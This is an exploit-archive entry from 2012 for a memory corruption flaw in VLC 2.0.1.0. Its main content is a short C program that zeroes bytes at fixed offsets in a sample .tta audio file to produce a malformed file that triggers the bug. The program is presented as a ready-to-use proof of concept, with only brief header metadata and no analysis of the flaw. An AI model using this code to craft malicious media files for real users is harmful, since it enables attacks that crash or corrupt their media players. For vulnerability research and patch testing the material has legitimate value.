VLC v. 2.0.1.0 .tta Memory Corruption



EKU-ID: 1701 CVE: OSVDB-ID:
Author: Dan Fosco Published: 2012-03-20 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: VLC v. 2.0.1.0 .tta Memory Corruption
# Date: 3/18/2012
# Author: Dan Fosco
# Vendor or Software Link: www.videolan.org
# Version: 2.0.1.0
# Category: local
# Google dork: n/a
# Tested on: Windows XP SP3 (64-bit)
# Demo site: n/a

Tested on stable 2.0, 1.1.11, 2.0.1.0 (newest release as of 3/15/2012)

#include <stdio.h>

int main(int argc, char *argv[])
{
FILE *f;
f = fopen(argv[1], "r+");

fseek(f, 10, SEEK_SET);
fputc('\x00', f);

fseek(f, 11, SEEK_SET);
fputc('\x00', f);

fseek(f, 26, SEEK_SET);
fputc('\x00', f);

fseek(f, 68, SEEK_SET);
fputc('\x00', f);

fseek(f, 59, SEEK_SET);
fputc('\x00', f);

fclose(f);
return 0;
}

//code updates .tta file, can find samples on videolan ftp server